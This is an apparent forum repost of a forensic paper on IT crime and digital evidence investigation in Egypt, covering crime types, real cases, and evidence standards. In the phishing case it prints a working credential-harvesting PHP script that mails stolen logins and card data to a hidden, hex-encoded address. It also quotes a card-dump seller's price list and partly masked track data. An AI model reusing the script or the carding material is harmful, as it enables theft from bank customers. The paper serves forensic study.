لارين
07-27-2009, 10:23 AM
IT-Crimes and digital evidence investigation
By:
Ahmed Mohamed Walid
Department of counterfeiting and forgery Researches
Medico-Legal Administration, Ministry of Justice
AhmedMWalid@hotmail.com
Table of Contents
Table of Contents .................................................. .................................................. ................3
List of Figures .................................................. .................................................. ......................5
Abstract .................................................. .................................................. ................................6
Introduction .................................................. .................................................. .........................7
Part І: IT-Crime .................................................. .................................................. ..................8
1.1 Definitions .................................................. .................................................. ..........9
1.2 Common types of computer crime .................................................. .......................9
1.2.1 Fraud by computer manipulation .................................................. ..........9
1.2.2 Computer forgery .................................................. .................................11
1.2.3 Damage to or modifications of computer data or programs ...................11
1.2.4 Unauthorized access to computer systems and service ..........................12
1.2.5 Unauthorized reproduction of legally protected computer programs ....15
1.3 E-Crime in Egypt ………………………………………………………….….....15
1.3.1 First Case (forgery) .................................................. ..............................16
1.3.2 Second case (currency counterfeiting) .................................................. .17
1.3.3 Third case (Credit card fraud ' Skimming') ………...…………….……20
1.3.4 Fourth case (Phishing) …………………………………………………26
Part П: Digital Evidence and Computer Crime ………………………………………….30
2.1 Definitions ……………………………………………………………………….31
2.2 Types of digital evidence ……………………………………………………......31
2.3 The Need for Standardization …………………………………………...………33
2.4 Standards ……………………………………………………………..……….…35
2.5 Investigative Tools …………………………………………………………..…..38
2.5.1 Overview …………………………………………………………...….38
2.5.2 Examples of hardware tools ………………………………………...…41
2.5.2.1 Forensic system …………………………………………...…41
2.5.2.2 RoadMASSter-3 ……………………………………………..41
2.5.2.3 HardCopy II Drive Imaging System ………………………...42
2.5.2.4 ImageMASSter 6007SAS ..…………………………...…….43
2.5.3 Examples of software tools ……………………………………………44
2.5.3.1 EnCase® Software …………………………………………..44
2.5.3.2 The Forensic ToolKit …....………………………………. …44
2.5.3.3 Decode - Forensic Date/Time Decoder …………………...…45
Part Ш: Standard model for digital evidences investigation in Egypt ………………….47
3.1 Qualified persons ………………..……………………………………………….48
3.2 Appropriate tools ……………….…………………………………………….….49
3.3 Methodology …….……………………………………………………………....49
References ……………………………………………………………………………..……51
Arabic Summary ……………………….………………………………………………..…53
List of Figures
Figure 1.1: Number of Internet subscribers …………………………………………………………………………..…15
Figure 1.2: The forged document ………………………………………………………...….16
Figure 1.3: Different types of currencies …………………………………………………….17
Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting …………….18
Figure 1.5: Egyptian currencies ……………………………………………………………..18
Figure 1.6: U.S.A currency ………………………………………………………………….19
Figure 1.7: Libyan currency …………………………………………………………..……19
Figure 1.8: Credit card writer & cards ………………………………………………………20
Figure 1.9: Skimmer ………………………………………………………………………...21
Figure 1.10: Screenshot for an offer mail of credit cards details …………………………...21
Figure 1.11: an offer mail of credit cards details …………………………………….....22-25
Figure 1.12: Sample of credit card details …………………………………………………..25
Figure 1.13: Phishing sites by country of host …………………………………………...…26
Figure 1.14: Screenshot for a phishing site part 1 …………………………………………..27
Figure 1.15: Screenshot for a phishing site part 2 …………………………………………..27
Figure 1.16: a script used in phishing processes …………..……………………………28-29
Figure 2.1: Forensic system ………………………………………………………………...41
Figure 2.2: RoadMASSter-3 ……………………………………………………………….41
Figure 2.3: 3 HardCopy II Drive Imaging System ………………………………………...42
Figure 2.4: ImageMASSter 6007SAS ……………………………………………………...43
Figure 2.5: EnCase® Software ……………………………………………………………..44
Figure 2.6: The Forensic ToolKit …………………………………………………………..44
Figure 2.7: Screenshot for Forensic Toolkit ……………………………………………......45
Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder ...………………………45
Abstract
With the evolution of using computers and internet, there is rapid increase in using these new technologies in crime, sometimes it's used as tool for traditional crime or to invent new type of crime, on both cases, it defines as IT-Crime (Information Technology Crime), IT-Crime can be viewed from different angles like law, social studies and computer sciences.
This paper discuss IT-crimes from forensic science perspective, by defining the IT-crimes and its common types then give examples of actual cases of IT-crime in Egypt , then we get into the core of this crime from forensic science point of view that evidences and investigation.
The paper explains the definition of digital evidence, its types, the need for standardization, the global effort in this filed, the evolution of investigation processes and examples of investigation tools.
Finally it gives a framework to establish a standard model for digital evidence investigation process in Egypt.
Introduction
The Internet, computer networks, and automated data systems present an enormous new opportunity for committing criminal activity. Computers and other electronic devices are being used increasingly to commit, enable, or support crimes perpetrated against persons, organizations, or property. Whether the crime involves attacks against computer systems, the information they contain, or more traditional crimes such as murder, money laundering, or fraud, electronic evidence increasingly is involved. It is no surprise that law enforcement and criminal justice officials are being overwhelmed by the volume of investigations and prosecutions that involve electronic evidence (1).
IT-Crime is a new field combining more than one area: Law, Computer Science, and Sociology. Jurist could examine that phenomenon from the perspective of the efficiency of the existing legislations to deal with it, Computer Specialist could examine that phenomenon from the perspective of the computer programs used in and its codes, Sociologist examines that phenomenon from the perspective of its effect in Community.
In this paper we study this phenomenon from forensic computer science point of view; we divided it into three parts, part І begins with definition of IT-Crime, its common types according to United Nations Manual on the prevention and control of computer-related crime, IT-Crime in Egypt and real cases of it. Part П talked about Digital Evidence and Computer Crime ,its Types , The Need for Standardization, Standards according to Scientific Working Group on Digital Evidence (SWGDE ) & International Organization on Digital Evidence (IOCE) , Investigative Tools and its development , Examples of hardware and software investigation tools .part Ш Our recommendations to establish a standard model for digital evidence investigation in Egypt .
Part І
IT-Crime
Part І
IT-Crime
1.1 Definitions:
There is no standard definition of e-crime. People use different terms with different meanings – cyber crime, hi-tech crime, computer crime, Internet crime, IT crime.
It is simply any criminal activity where a computer or network is the tool, target, or place of a crime. These categories are not exclusive and many activities can be characterized as falling in one or more category. Additionally, although the terms computer crime or cyber crime are more properly restricted to describing criminal activity in which the computer or network is a necessary part of the crime, these terms are also sometimes used to include traditional crimes, such as fraud, theft, blackmail, forgery, and embezzlement, in which computers or networks are used to facilitate the illicit activity (2).
1.2 Common types of computer crime:
( According to United Nations Manual on the prevention and control of computer-related crime(3) )
All stages of computer operations are susceptible to criminal activity, either as the target of the crime or the instrument of the crime or both. Input operations, data processing, output operations and communications have all been utilized for illicit purposes. The more common types of computer-related crime are categorized next:
1.2.1 Fraud by computer manipulation:
Intangible assets represented in data format, such as money on deposit or hours of work, are the most common targets of computer-related fraud. Modern business is quickly replacing cash with deposits transacted on computer systems, creating an enormous potential for computer abuse. Credit card information, as well as personal and financial information on credit-card clients, has been frequently targeted by the organized criminal community. The sale of this information to counterfeiters of credit cards and travel documents has proven to be extremely lucrative. Assets represented in data format often have a considerably higher value than traditionally targeted economic assets, resulting in potentially greater economic loss. In addition, improved remote access to databases allows the criminal the opportunity to commit various types of fraud without ever physically entering the premises of the victim
Computer fraud by input manipulation is the most common computer crime, as it is easily perpetrated and difficult to detect. Often referred to as "data diddling", it does not require any sophisticated computer knowledge and can be committed by anyone having access to normal data-processing functions at the input stage.
Program manipulation, which is very difficult to discover and is frequently not recognized, requires the perpetrator to have computer-specific knowledge. It involves changing existing programs in the computer system or inserting new programs or routines. A common method used by persons with specialized knowledge of computer programming is the Trojan horse, whereby computer instructions are covertly placed in a computer program so that it will perform an unauthorized function concurrent with its normal function. A Trojan horse can be programmed to self-destruct, leaving no evidence of its existence except the damage that it caused. Remote access capabilities today also allow the criminal to easily run modified routines concurrently with legitimate programs.
Output manipulation is effected by targeting the output of the computer system. The obvious example is cash dispenser fraud, achieved by falsifying instructions to the computer in the input stage. Traditionally, such fraud involved the use of stolen bank cards. However, specialized computer hardware and software is now being widely used to encode falsified electronic information on the magnetic strips of bank cards and credit cards.
1.2.2 Computer forgery:
Where data are altered in respect of documents stored in computerized form, the crime is forgery. In this and the above examples, computer systems are the target of criminal activity. Computers, however, can also be used as instruments with which to commit forgery. The created a new library of tools with which to forge the documents used in commerce. A new generation of fraudulent alteration or counterfeiting emerged when computerized color laser copiers became available. These copiers are capable of high-resolution copying, the modification of documents and even the creation of false documents without benefit of an original, and they produce documents whose quality is indistinguishable from that of authentic documents except by an expert.
1.2.3 Damage to or modifications of computer data or programs :
This category of criminal activity involves either direct or covert unauthorized access to a computer system by the introduction of new programs known as viruses, "worms" or logic bombs. The unauthorized modification, suppression or erasure of computer data or functions with the internet to hinder normal functioning of the system is clearly criminal activity and is commonly referred to as computer sabotage. Computer sabotage can be the vehicle for gaining economic advantage over a competitor, for promoting the illegal activities of ideologically motivated terrorists or for stealing data or programs (also referred to as "bitnapping") for extortion purposes. In one reported incident at London, Ontario, in 1987, a former employee of a company sought unsuccessfully to sabotage the computer system of the company by inserting a program into the system that would have wiped it out completely.
A virus is a series of program codes that has the ability to attach itself to legitimate programs and propagate itself to other computer programs. A virus can be introduced to a system by a legitimate piece of software that has been infected, as well as by the Trojan horse method discussed above.
The potential purposes of viruses are many, ranging from the display of harmless messages on several computer terminals to the irreversible destruction of all data on a computer system. In 1990, Europe first experienced a computer virus, used to commit extortion in the medical research community. The virus threatened to destroy increasing amounts of data if no ransom was paid for the "cure". A significant amount of valuable medical research data was lost as a result.
A worm is similarly constructed to infiltrate legitimate data-processing programs and to alter or destroy the data, but it differs from a virus in that it does not have the ability to replicate itself. In a medical analogy, the worm can be compared to a benign tumor, the virus to a malignant one. However, the consequences of a worm attack can be just as serious as those of a virus attack: for example, a bank computer can be instructed, by a worm program that subsequently destroys itself, to continually transfer money to an illicit account.
A logic bomb, also known as a "time bomb", is another technique by which computer sabotage can be perpetrated. The creation of logic bombs requires some specialized knowledge, as it involves programming the destruction or modification of data at a specific time in the future. Unlike viruses or worms, however, logic bombs are very difficult to detect before they blow up; thus, of all these computer crime schemes, they have the greatest potential for damage. Detonation can be timed to cause maximum damage and to take place long after the departure of the perpetrator. The logic bomb may also be used as a tool of extortion, with a ransom being demanded in exchange for disclosure of the location of the bomb.
Irrespective of motive, the fact remains that the use of viruses, worms and logic bombs constitutes unauthorized modification of legitimate computer data or programs and thus fall under the rubric computer sabotage, although the motive of the sabotage may be circumstantial to the alteration of the data.
1.2.4 Unauthorized access to computer systems and service :
The desire to gain unauthorized access to computer systems can be prompted by several motives, from simple curiosity, as exemplified by many hackers, to computer sabotage or espionage. Intentional and unjustified access by a person not authorized by the owners or operators of a system may often constitute criminal behavior. Unauthorized access creates the opportunity to cause additional unintended damage to data, system crashes or impediments to legitimate system users by negligence.
Access is often accomplished from a remote location along a telecommunication network, by one of several means. The perpetrator may be able to take advantage of lax security measures to gain access or may find loopholes in existing security measures or system procedures. Frequently, hackers impersonate legitimate system users; this is especially common in systems where users can employ common passwords or maintenance passwords found in the system itself.
Password protection is often mischaracterized as a protective device against unauthorized access. However, the modern hacker can easily circumvent this protection using one of three common methods. If a hacker is able to discover a password allowing access, then a Trojan horse program can be placed to capture the other passwords of legitimate users. This type of program can operate concurrently with the normal security function and is difficult to detect. The hacker can later retrieve the program containing the stolen passwords by remote access.
Password protection can also be bypassed successfully by utilizing password cracking routines. Most modern software effects password security by a process that converts a user's selected password into a mathematical series, a process known as encryption. Encryption disguises the actual password, which is then almost impossible to decrypt. Furthermore, legitimate security software has been developed that allows access to data only after it checks encrypted passwords against a dictionary of common passwords so as to alert system administrators of potential weakness in security. However, this same security process can be imitated for illegitimate purposes. Known as a "cracker" program when used for illegitimate purposes, these tools encrypt some or all of the data of the system. This creates a dictionary of data to compare with cracker software, for the purpose of identifying common passwords and gaining access to the system. A variety of these system-specific encryption routines can be obtained from hacker bulletin boards around the world and are regularly updated by the criminal community as security technology develops.
The third method commonly used to access a system is the "trapdoor" method, whereby unauthorized access is achieved through access points, or trapdoors, created for legitimate purposes, such as maintenance of the system.
The international criminal hacker community uses electronic bulletin boards to communicate system infiltration incidents and methods. In one case, details of a Canadian attempt to access a system were found on suspects in an unrelated matter in England; they had removed the material from a bulletin board in Germany. This sharing of information can facilitate multiple unauthorized infiltrations of a system from around the globe, resulting in staggering telecommunication charges to the victim.
With the development of modern telecommunications system, a new field for unauthorized infiltration was created. Personal telecommunications have been expanded with the advent of portable, cellular telecommunication devices. The criminal community has responded to these advances by duplicating the microchip technology.
Modern telecommunications systems are equally vulnerable to criminal activity. Office automation systems such as voice mail boxes and private business exchanges are, in effect, computer systems, designed for the convenience of users. However, convenience features such as remote access and maintenance capabilities, call-forwarding and voice-messaging are easily infiltrated by computer criminals.
Modern telecommunications systems, like other computer systems, are also susceptible to abuse by remote access. The integration of telecommunications systems means that once one system is accessed, a computer operator with sufficient skill could infiltrate the entire telecommunications network of a city. The usual motive for telecommunications crime is to obtain free telecommunications services. However, more innovative telecommunications fraud has also been uncovered, and telecommunications systems have been used to disguise other forms of criminal activity.
1.2.5 Unauthorized reproduction of legally protected computer programs :
The unauthorized reproduction of computer programs can mean a substantial economic loss to the legitimate owners. Several jurisdictions have dictated that this type of activity should be the subject of criminal sanction. The problem has reached transnational dimensions with the trafficking of these unauthorized reproductions over modern telecommunication networks.
1.3 E-Crime in Egypt :
The question is where are we from this phenomenon?
As the increase of computer and internet users in the last few years, the e-crime also increases.
Figure 1.1: Number of Internet subscribers (4)
The numbers of internet subscribers is 5,200,000 at 30/06/2006
The using of computer in criminal activity is beginning first as an aid tools in traditional crimes like document forgery and currency counterfeiting, and then the other types of e-crimes come later.
In this paper we will gave four real cases of e-crimes in Egypt:
1.3.1 First Case (forgery):
It is an example of the using of computer as an aid tool in a traditional crime, in this case the forger use the scanner to get the signature and the fingerprint of the victim from genuine document and then print them by colored printer in another document.
Figure 1.2: The forged document
1.3.2 Second case (currency counterfeiting):
It is another case of the using of computer in traditional crime; Currency counterfeiting is the most fundamental financial crime (http://www.interpol.int/Public/FinancialCrime/Default.asp) – the production of counterfeit currency – recognizes no national boundaries. In Egypt we see Egyptian pounds, dollars, euro, Arabic currencies and others.
In the last few years currency counterfeiting is increase due to the increase of computer users and the low price and more quality of scanners and color printers.
Figure 1.3: Different types of currencies
Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting
Figure 1.5: Egyptian currencies
Figure 1.6: U.S.A currency
Figure 1.7: Libyan currency
1.3.3 Third case (Credit card fraud ' Skimming'):
Skimming is the theft of credit card information by a dishonest employee of a legitimate merchant, manually copying down numbers, or using a magnetic stripe reader on a pocket-sized electronic device. Common scenarios for skimming are restaurants or bars where the skimmer has possession of the victim's credit card out of their immediate view. The skimmer will typically use a small keypad to unobtrusively transcribe the 3 or 4 digits Card Security Code which is not present on the magnetic strip. Many instances of skimming have been reported where the perpetrator has put a device over the card slot of a public cash machine (Automated teller machine), which reads the magnetic strip as the user unknowingly passes their card through it. These devices are often used in conjunction with a pinhole camera to read the user's PIN at the same time.
The cost of credit card fraud reaches into billions of dollars annually. In 2006, fraud in the United Kingdom alone was estimated at £428.0 million (about $700-800 million) (5).
Figure 1.8: Credit card writer & cards
Figure 1.9:( Skimmer is a tiny device that reads your credit card number and delivers it to bad guys (6))
Figure 1.10: Screenshot for an offer mail of credit cards details
>Subject: Skimmed d umps from Hotel DB. News and prices>Date: Mon, 8 Jan 2007 07:55:13 -0800 (PST)> >Hello, i am luxmarket and i am selling dumps since>times of carderplanet. Without excess modesty i want>to say that i am one of the biggest dumps vendor for>the moment.> >On 10/12/2006 brand new, virgin EU DB were released. A>lot of high quality, RARE, high limit EU dumps.> > > Here is my offer for dumps:> >US Dumps> US Mix>(20Gold/20Plats/20Biz&Corp/40MCstandart&calssic), bin>on my choose - $10/one in the count you taking 100+>(e.g. 100 dumps - $1000)> US Classic - $15, Debit Classic - $15> >US MC Standart – $18> > US Gold - $18> US Platinum - $30> US Purchasing/Signature - $40> US Bussines/Corporate - $40> US MC World - $50> >EU dumps> EU Italy Classic - $200> EU Italy Gold - $230> EU Italy Platinum - $300> EU Italy Bussines - $310> EU Spain/Switzerland/Turkey/Greece etc Classic - $120> EU Spain/Switzerland/Turkey/Greece etc Gold - $180> EU Spain/Switzerland/Turkey/Greece etc Platinum ->$180> EU Spain/Switzerland/Turkey/Greece etc Bussines ->$300> EU Germany/UK Classic - $180> EU Germany/UK Gold - $200> > EU Germany/UK Platinum - $180> EU Germany/UK Bussines - $180> EU Other MC standart - $185> EU Other Gold - $180> EU Other Platinum - $185> EU Other Bussines/Corporate - $185> EU Infinite - $1200> EU Amex Black - $1200> EU Dinners - $120> >Arab-countries dumps> Arab Visa Classic - $300> Arab Visa Gold - $300> Arab Visa Platinum - $420> Arab Business/Corporate - $420> Arab Infinite - $1600> Arab Amex - $120> Arab Dinners - $100> >Chipped (201) dumps
>Why the price for EU is too high?>-The price is high because the quality of the goods>are high. High quality costs big money. Let me show>you an example: someone driving BMW nd somebody can>drive Fiat or Seat or something cheap, when you>driving in bmw you feel comfort and freely, but for>this comfort you have to pay money, otherwise - you>drive seat and there is no such comfort and safety ->but less price, you can buy used car at all and crash>it in incedent ;-) . The same story with the dumps,>you can buy cheap dumps from cheap vendor, or from the>ripper at all and you risking to be ripped, or even>worse you can get dumps from old base which is under>control or in warn list and got caught. Choice is>after you... But here is my last word: for the moment>i writing those words the validity of the dumps is on>top (about 90%) and even classics working about 2k>EUR, you really paying for serious stuff you not seen>before. Once again: choice after you...> >What is the minimal sum of the deal with you?>-There is no minimal order - minimal order is one>dump.> >What is the minimal sum of the deal with you if I pay>via E-gold?>-There is no minimal order - minimal order is one>dump.> >What is the format of your dumps?>-My dumps are in the 1-st and 2-nd track format.> >Do you sell the dumps with the original first track?>-Yes.> >How fast can I receive the dumps after the supplying>the info about Western union payment?>-Usally same time as i receiving money. For WU - you>getting the order once my drop picks the funds up.>Sometimes delivery time can be raised up to 24h (very>rare case)> >Do you allow the discounts for great orders?>-Yes, sure. Also i provide amazing discounts for a>long-term custommers and just if i am in good mood.> >After I've sent you Western union order, what info>should I let you know of?>-The name and the surname of the sender, MTCN>(10-digit code), amount, city, state and country.> >Do you replace the dumps if during the use I've>received DECLINE, PICK UP, unsufficient funds, call>for authorization etc.?>-No, I don't make any replacements, cause I check all>the dumps before the selling on the good checking>service, which doesn't kill dumps as rapidly as the>other ones. But in some cases i can investigate why>this happened.> >Will your US dumps work in the Europe?>-I don't recommend to buy the dumps for the Europe,>cause some dumps work there, but some - don't work and>I do not offer any guarantee.> >Do you sell your dumps on credit?>-No, I don't, cause the credit spoils the>relationship.> >I am want to buy, but i am affraid to be ripped. What>to do?>-Yes, we understanding you - there is very lot of>rippers over the internet for the moment. Because this>we offer you not to order a bulk for a first time ->you can order 1-2pcs for test and later proceed to>bigger ammounts, so we will know better each other.> >May i have one or two dumps for test?>Yes. You can BUY one or two dumps for test - there is>no minimum.>WE NOT PROVIDING ANY FREE DUMPS.THOSE WHO PROCEED TO>ANNOY AFTER FIRST WARNING IN ICQ WILL IMMEDIATELLY>WILL BE ADDED TO IGNORE LIST.>NO MONEY - NO HONEY.> >I not know what BIN to order. Can you help me?>-Yes, if i know what is good in your region and i have>it in my stock - i will provide you with the pleasure.
Figure 1.11: an offer mail of credit cards details
B5490??????????14248^FU /PABLO ^06111010000004100???????00000
5490????????????14248=0611??????00004100000
MBNA platinum
B51488?????????998^WELNA /MICHAEL R ^070510100????????000000000
51488??????????998=070510100??????7000000
Figure 1.12: Sample of credit card details
1.3.4 Fourth case (Phishing):
Phishing is the act of sending an e-mail (http://www.webopedia.com/TERM/P/e_mail.html) to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site (http://www.webopedia.com/TERM/P/Web_site.html) where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information (7).
Figure 1.13: Phishing sites by country of host (8)
Figure 1.14: Screenshot for a phishing site part 1
Figure 1.15: Screenshot for a phishing site part 2
<?php
$COOKIE_VAR="616c6c616e64736d6969746840696e626f782e636f6d";
//USER ACCOUNT
$account_state = $_POST['account_state'];
$online_id = $_POST['online_id'];
$pin = $_POST['pin'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
//BILLING ADDRESS
$cardname = $_POST['cardname'];
$address1 = $_POST['address1'];
$address2 = $_POST['address2'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$phone = $_POST['phone'];
//ACCOUNT INFORMATION
$ccnumber= $_POST['ccnumber'];
$mexpcc = $_POST['mexpcc'];
$yexpcc = $_POST['yexpcc'];
$cvv = $_POST['cvv'];
$ban = $_POST['ban'];
$brn = $_POST['brn'];
//SECURITY QUESTION
$mmn = $_POST['mmn'];
$ssn = $_POST['ssn'];
$dob = $_POST['dob'];
$dln = $_POST['dln'];
$msg = "--------------------------------------
Account open in : $account_state\nOnline ID : $online_id\nPasscode : $passcode\nATM PIN : $pin\nEmail : $email
--------------------------------------
Card Holder Name : $cardname\nAddress1 : $address1\nAddress2 : $address2\nCity : $city\nState : $state\nZipcode : $zip\nPhone : $phone
----------------------------------------
Credit Card Number : $ccnumber\nExpiration Date : $mexpcc-$yexpcc\nCVV2 : $cvv\nSiteKey Question 1 : $ban\nSiteKey Question 2 : $brn
----------------------------------------
SiteKey Answer 1 : $mmn\nSiteKey Answer 2 : $ssn\nMMN : $dln\nSSN : $dob
----------------------------------------\n";
$to="???????@yahoo.com";
$message="";
for ($j=0; $j<strlen($COOKIE_VAR);$j=$j+2)
{
$message.=chr(hexdec($COOKIE_VAR[$j].$COOKIE_VAR[$j+1]));
}
$subj = "$ccnumber - nEwBOA";
$from = "Kids@BankOfAmerica.com";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}
header("Location: complete.htm");
?>
Figure 1.16: a script used in phishing processes
Part П
Digital Evidence and Computer Crime
Part П
Digital Evidence and Computer Crime
Within the past few years a new class of crime scenes has become more prevalent, that is, crimes committed within electronic or digital domains, particularly within cyberspace. Criminal justice agencies throughout the world are being confronted with an increased need to investigate crimes perpetrated partially or entirely over the Internet or other electronic media. Resources and procedures are needed to effectively search for, locate, and preserve all types of electronic evidence. This evidence ranges from images of child pornography to encrypted data used to further a variety of criminal activities. Even in investigations that are not primarily electronic in nature, at some point in the investigation computer files or data may be discovered and further analysis required (9).
2.1 Definitions:
Digital evidence or electronic evidence is any probative information stored or transmitted in digital form that a party to a court case may use at trial (10).
The definition proposed by the Standard Working Group on Digital Evidence (SWGDE) is any information of probative value that is either stored or transmitted in a digital form. Another definition proposed by the International Organization of Computer Evidence (IOCE) is information stored or transmitted in binary form that may be relied upon in court. However, these definitions focus too heavily on proof and neglect data that simply further an investigation. Additionally, the term binary in the later definition is inexact, describing just one of many common representations of computerized data (11).
Types of digital evidence:
The use of digital evidence has increased in the past few decades as courts have allowed the use of e-mails, digital photographs, ATM transaction logs, word processing documents, instant message histories, files saved from accounting programs, spreadsheets, internet browser histories, databases, the contents of computer memory, computer backups, computer printouts, Global Positioning System tracks, logs from a hotel’s electronic door locks, and digital video or audio files (10).
In Egypt low no. 15\2004 allowed the use of digital evidences in court.
The terms digital evidence and electronic evidence are sometimes used interchangeably. However, an effort should be made to distinguish between electronic devices such as mobile telephones and the digital data that they contain. When considering the many sources of digital evidence, it is useful to categorize computer systems into three groups:
Open computer systems: Open computer systems are what most people think of as computers - systems comprised of hard drives, keyboards, and monitors such as laptops, desktops, and servers that obey standards. These systems, with their ever increasing amounts of storage space, can be rich sources of digital evidence. A simple file can contain incriminating information and can have associated properties that are useful in an investigation. For example, details such as when a file was created, who created it, or that it was created on another computer can all be important.
Communication systems: Traditional telephone systems, wireless telecommunication systems, the Internet, and networks in general can be a source of digital evidence. For instance, the Internet carries e-mail messages around the world. The time a message was sent, who sent it, or what the message contained can all be important in an investigation. To verify when a message was sent, it may be necessary to examine log files from intermediate servers and routers that handled a given message. To verify the contents of a message, it may be necessary to eavesdrop on the communication as it occurs.
Embedded computer systems: Mobile telephones, personal digital assistants, smart cards, and many other systems with embedded computers may contain digital evidence. For example, navigation systems can be used to determine where a vehicle has been and Sensing and Diagnostic Modules in many vehicles hold data that can be useful for understanding accidents, including the vehicle speed, brake status, and throttle position during the last five seconds before impact. Microwave ovens are now available with embedded computers that can download information from the Internet and some home appliances allow users to program them remotely via a wireless network or the Internet. In an arson investigation, data recovered from a microwave can indicate that it was programmed to trigger a fire at a specific time (11).
2.2 The Need for Standardization :
In 1994, the O.J. Simpson trial exposed many of the weaknesses of criminal investigation and forensic science. The investigation was hampered from the start with incomplete evidence collection, documentation and preservation at the crime scenes. Arguably, as a result of these initial errors, experienced forensic scientists were confused by and incorrectly interpreted important exhibits, introducing sufficient doubt for the jurors. The controversy surrounding this case made it clear that investigators and forensic scientists were not as reliable as was previously believed, undermining not just their credibility but also that of their profession. This crisis motivated many crime laboratories and investigative agencies to revise their procedures, improve training, and make other changes to avoid similar problems in the future. More recently flaws have been found in the fingerprint and DNA analysis performed by some crime laboratories, calling many convictions into questions and creating doubts about the analytical techniques themselves.
A similar crisis is looming in the area of digital evidence. The lack of generally required standards of practice and training allows weaknesses to persist, resulting in incomplete evidence collection, documentation and preservation as well as errors in analysis and interpretation of digital evidence. Innocent individuals may be in jail as a result of improper digital evidence handling and interpretation allowing the guilty to remain free. Failures to collect digital evidence have undermined investigations, preventing the apprehension or prosecution of offenders and wasting valuable resources on cases abandoned due to faulty evidence. If this situation is not corrected, the field will not develop to its full potential, justice will not be served, and we risk a crisis that could discredit the field. The only reason we have not already encountered such as crisis is that our mistakes have been masked by obscurity. As more cases become reliant on digital evidence and more attention is focused on it, we must take steps to establish standards of practice and compel practitioners to conform to them.
There have been several noteworthy developments toward standardization in this field. The International Organization of Computer Evidence (www.ioce.org (http://www.ioce.org/)) was established in the mid-1990s "to ensure the harmonization of methods and practices among nations and guarantee the ability to use digital evidence collected by one state in the courts of another state." In 1998, the Scientific Working Group on Digital Evidence (www.swgde.org (http://www.swgde.org/)) was established to "promulgate accepted forensic guidelines and definitions for the handling of digital evidence." In 2001, the first Digital Forensics Research Work Shop (www.dfrws.org (http://www.dfrws.org/)) was held, bringing together knowledgeable individuals from academia, military and the private sector to discuss the main challenges and research needs in the field. This workshop also gave new life to an idea proposed several years earlier — a peer-reviewed journal - leading to the creation of the International Journal of Digital Evidence (www.ijde.org (http://www.ijde.org/)). In 2003, the American Society of Crime Laboratory Directors/Laboratory Accreditation Board (ASCLD/LAB) updated its accreditation manual to include standards and criteria for digital evidence examiners in US crime laboratories. In 2004 the UK Forensic Science Service plans to develop a registry of qualified experts, and several European organizations, including the European Network of Forensic Science Institutes (ENFSI) will publish examination and report writing guidelines for digital investigators. Also, Elsevier will begin publishing Digital Investigation: The International Journal of Digital Forensics and Incident Response (http://www.compseconline.com/digitalinvestigation/ (http://www.compseconline.com/digitalinvestigation/)).
Historically, Forensic Science disciplines have used certification to oversee standards of practice and training. Certification provides a standard that individuals need to reach to qualify in a profession and provides an incentive to reach a certain level of knowledge. Without certification, the target and rewards of extra effort are unclear. This is not to say that everyone who handles digital evidence requires the same level of skill or training. A strong certification program needs to have tiered levels of certification facilitating progression upwards, setting basic requirements for crime scene technicians, and setting higher standards for specialists in a laboratory and for investigators who are responsible for analyzing evidence.
Although there are a growing number of certification programs for digital investigators, many are only available to law enforcement personnel and none are internationally accepted. In 2004, representatives from around the world convened to discuss the feasibility of an internationally accepted certification for digital investigators. The outcome is not decided and there are obstacles to such a certification. Some feel that proposed training requirements are too high while others fear that certification will enable anyone to enter the field and obtain specialized knowledge, even individuals who work for the defense on criminal cases. There is also the fear that setting standards and placing additional requirements on practitioners will make it more difficult to get digital evidence admitted in court(11).
Scientific Working Group on Digital Evidence (SWGDE)(12)
International Organization on Digital Evidence (IOCE)
2.3 Standards:
Principle 1
In order to ensure that digital evidence is collected, preserved, examined, or transferred in a manner safeguarding the accuracy and reliability of the evidence, law enforcement and forensic organizations must establish and maintain an effective quality system. Standard Operating Procedures (SOPs) are documented quality-control guidelines that must be supported by proper case records and use broadly accepted procedures, equipment, and materials.
Standards and Criteria 1.1
All agencies that seize and/or examine digital evidence must maintain an appropriate SOP document. All elements of an agency's policies and procedures concerning digital evidence must be clearly set forth in this SOP document, which must be issued under the agency's management authority.
Discussion.The use of SOPs is fundamental to both law enforcement and forensic science. Guidelines that are consistent with scientific and legal principles are essential to the acceptance of results and conclusions by courts and other agencies. The development and implementation of these SOPs must be under an agency's management authority.
Standards and Criteria 1.2
Agency management must review the SOPs on an annual basis to ensure their continued suitability and effectiveness.
Discussion.Rapid technological changes are the hallmark of digital evidence, with the types, formats, and methods for seizing and examining digital evidence changing quickly. In order to ensure that personnel, training, equipment, and procedures continue to be appropriate and effective, management must review and update SOP documents annually.
Standards and Criteria 1.3
Procedures used must be generally accepted in the field or supported by data gathered and recorded in a scientific manner.
Discussion.Because a variety of scientific procedures may validly be applied to a given problem, standards and criteria for assessing procedures need to remain flexible. The validity of a procedure may be established by demonstrating the accuracy and reliability of specific techniques. In the digital evidence area, peer review of SOPs by other agencies may be useful.
Standards and Criteria 1.4
The agency must maintain written copies of appropriate technical procedures.
Discussion.Procedures should set forth their purpose and appropriate application. Required elements such as hardware and software must be listed and the proper steps for successful use should be listed or discussed. Any limitations in the use of the procedure or the use or interpretation of the results should be established. Personnel who use these procedures must be familiar with them and have them available for reference.
Standards and Criteria 1.5
The agency must use hardware and software that is appropriate and effective for the seizure or examination procedure.
Discussion.Although many acceptable procedures may be used to perform a task, considerable variation among cases requires that personnel have the flexibility to exercise judgment in selecting a method appropriate to the problem.
Hardware used in the seizure and/or examination of digital evidence should be in good operating condition and be tested to ensure that it operates correctly. Software must be tested to ensure that it produces reliable results for use in seizure and/or examination purposes.
Standards and Criteria 1.6
All activity relating to the seizure, storage, examination, or transfer of digital evidence must be recorded in writing and be available for review and testimony.
Discussion.In general, documentation to support conclusions must be such that, in the absence of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator.
The requirement for evidence reliability necessitates a chain of custody for all items of evidence. Chain-of-custody documentation must be maintained for all digital evidence.
